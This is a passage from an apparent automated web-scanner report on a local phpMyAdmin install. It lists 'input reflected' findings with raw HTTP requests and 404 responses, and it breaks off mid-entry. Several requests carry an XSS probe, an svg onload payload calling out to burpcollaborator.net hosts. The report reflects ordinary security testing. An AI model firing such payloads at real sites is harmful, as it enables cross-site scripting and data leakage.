Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14441
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<![CDATA[
PMA_commonParams.setAll({common_query:"",opendb_url:"db_structure.php",lang:"en",server:"1",table:"3qsbs0mdeb",db:"",token:"wa(zzA0]mEw$v1)L",text_dir:"ltr",show_databases_navigation_as_tree:true,pma_text_default_tab:"Browse",pma_text_left_default_tab:"Structure",pma_text_left_default_tab2:false,LimitChars:"5
...[SNIP]...
<input type="hidden" name="table" value="3qsbs0mdeb" />
...[SNIP]...
<input type="hidden" name="table" value="3qsbs0mdeb" />
...[SNIP]...
19.208. http://localhost/phpmyadmin/js/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jspdl71rxlne/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jspdl71rxlne/ was not found on this server.</p>
...[SNIP]...
19.209. http://localhost/phpmyadmin/js/ajax.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/ajax.jshqgtlhzt2a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:05 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/ajax.jshqgtlhzt2a was not found on this server.</p>
...[SNIP]...
19.210. http://localhost/phpmyadmin/js/ajax.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//b8keyxv5v2oy0w19dm2k4tbl3c97xyzrnjd7au0ip%5c56burpcollaborator.net'%3e/js/ajax.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//b8keyxv5v2oy0w19dm2k4tbl3c97xyzrnjd7au0ip\56burpcollaborator.net'&gt;/js/ajax.js was not found on this server.</p>
...[SNIP]...
19.211. http://localhost/phpmyadmin/js/ajax.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jspn87gh2cg3/ajax.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jspn87gh2cg3/ajax.js was not found on this server.</p>
...[SNIP]...
19.212. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addon/lint/sql-lint.jsceupy5vvch HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addon/lint/sql-lint.jsceupy5vvch was not found on this server.</p>
...[SNIP]...
19.213. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//xvw0ljiriobkniov08p6rfy7qywtkkmlad01xoncc%5c56burpcollaborator.net'%3e/js/codemirror/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 435
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//xvw0ljiriobkniov08p6rfy7qywtkkmlad01xoncc\56burpcollaborator.net'&gt;/js/codemirror/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.214. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jsc1wpifh48h/codemirror/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jsc1wpifh48h/codemirror/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.215. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror1y553e5qv5/addon/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror1y553e5qv5/addon/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.216. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addonq0vxdgkdch/lint/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addonq0vxdgkdch/lint/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.217. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addon/lintmssokyf87a/sql-lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/codemirror/addon/lintmssokyf87a/sql-lint.js was not found on this server.</p>
...[SNIP]...
19.218. http://localhost/phpmyadmin/js/common.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//l6sow7tftcm8y6zjbw0u239v1m7hv8xcl4bs2kpadz%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//l6sow7tftcm8y6zjbw0u239v1m7hv8xcl4bs2kpadz\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.219. http://localhost/phpmyadmin/js/common.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//h8qky3vbv8o4021fds2q4zbr3i9dx4z8n0doab0zp%5c56burpcollaborator.net'%3e/js/common.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 411
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//h8qky3vbv8o4021fds2q4zbr3i9dx4z8n0doab0zp\56burpcollaborator.net'&gt;/js/common.js was not found on this server.</p>
...[SNIP]...
19.220. http://localhost/phpmyadmin/js/common.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/common.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/js5tyzqi1dnx/common.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js5tyzqi1dnx/common.js was not found on this server.</p>
...[SNIP]...
19.221. http://localhost/phpmyadmin/js/config.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7u2akth1hyaumsn5ziogqpxhp8v3jumkac00rsei27%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7u2akth1hyaumsn5ziogqpxhp8v3jumkac00rsei27\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.222. http://localhost/phpmyadmin/js/config.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//tb8w1fynykrg3e4rg4527be36ucp0g36ryhme94xt%5c56burpcollaborator.net'%3e/js/config.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 411
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//tb8w1fynykrg3e4rg4527be36ucp0g36ryhme94xt\56burpcollaborator.net'&gt;/js/config.js was not found on this server.</p>
...[SNIP]...
19.223. http://localhost/phpmyadmin/js/config.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/config.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jshpqdizba3z/config.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jshpqdizba3z/config.js was not found on this server.</p>
...[SNIP]...
19.224. http://localhost/phpmyadmin/js/console.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//cbrf1yy6y3rz3x4agn5l7uem6dc80z3qrih68yvojd%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//cbrf1yy6y3rz3x4agn5l7uem6dc80z3qrih68yvojd\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.225. http://localhost/phpmyadmin/js/console.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//g3kjt2qaq7j3v1we8rxpzy6qyh4cs3vujm9a6xwll%5c56burpcollaborator.net'%3e/js/console.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 412
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//g3kjt2qaq7j3v1we8rxpzy6qyh4cs3vujm9a6xwll\56burpcollaborator.net'&gt;/js/console.js was not found on this server.</p>
...[SNIP]...
19.226. http://localhost/phpmyadmin/js/console.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/console.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jssj2xqe14io/console.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jssj2xqe14io/console.js was not found on this server.</p>
...[SNIP]...
19.227. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//cdtf3y0603tz5x6ain7l9ugm8de82z5stkj8a0xqlf%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//cdtf3y0603tz5x6ain7l9ugm8de82z5stkj8a0xqlf\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.228. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ar5dhwe4e17xjvk8wlljnsukmbs6gxjq7ix6utkh9%5c56burpcollaborator.net'%3e/js/cross_framing_protection.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ar5dhwe4e17xjvk8wlljnsukmbs6gxjq7ix6utkh9\56burpcollaborator.net'&gt;/js/cross_framing_protection.js was not found on this server.</p>
...[SNIP]...
19.229. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
